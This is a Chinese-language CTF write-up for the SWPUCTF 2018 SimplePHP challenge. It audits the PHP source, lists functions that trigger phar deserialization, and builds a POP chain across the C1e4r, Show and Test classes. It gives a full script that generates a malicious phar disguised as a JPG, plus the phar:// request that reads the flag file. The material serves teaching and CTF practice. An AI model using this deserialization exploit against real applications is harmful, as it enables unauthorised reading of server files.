phar反序列化例题二

phar反序列化例题二

[SWPUCTF 2018]SimplePHP 1

文件下载

url处发现文件可下载，此处不贴出来了，不占太多篇幅

代码审计

class.php处提示phar反序列化，base.php提示flag在f1ag.php

然后开始捋关系

index.php

index.php包含了base.php(写有文件上传、查看的页面)。

base.php

base.php可以到upload_file.php、file.php

upload_file.php

使用了function.php中的函数，并提供了一个提交表单

function.php

接收上传的文件->检查文件类型、生成文件名、移动文件到指定位置

file.php

是个查看文件的地方，设置了目录为/var/www/html/，检查文件是否存在，然后调用class.php中方法打印文件内容

寻找pop链

phar反序列化触发函数

fileatime	filectime	file_exists	file_get_contents
file_put_contents	file	filegroup	fopen
fileinode	filemtime	fileowner	fileperms
is_dir	is_executable	is_file	is_link
is_readable	is_writable	is_writeable	parse_ini_file
copy	unlink	stat	readfile

从file.php中可以看到存在触发phar反序列化的file_exists。

class.php

这里可以利用到echo输出，是反序列化的入点

class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

同时可以利用到Show类中的__toString()

    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }

但是后面的链该怎么连？于是就打算从末端开始看，很显然这里的file_get_contents是函数的最终点。从这里开始往上倒推。

    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }

class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)//连锁触发的开端
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)//最终点
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}

从上面的Test类中可以看到一连串的触发是通过__get来实现的，即__toString下一步该触发的是__get才能完成一个pop链

payload

<?php

class C1e4r
{
    public $test;
    public $str;
}

class Show
{
    public $source;
    public $str;
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array('source'=>'/var/www/html/f1ag.php');
    }//也可以写成params[source]='/var/www/html/f1ag.php',这里的路径从file.php中可以看到

}
$c = new C1e4r();
$s=new Show();
$t =new Test();
$s->source=$s;
$s->str['str']=$t;
$c->str=$s;


$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($c); //触发的头是C1e4r类，所以传入C1e4r对象
$phar->addFromString("exp.txt", "test");
$phar->stopBuffering();

?>

生成的phar修改为jpg，还要计算图片的名字，或者访问upload目录(这.....)

  $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 

到查看文件的目录下

buuoj.cn:81/file.php?file=phar://upload/d98ab935563b1ea861964510390e889e.jpg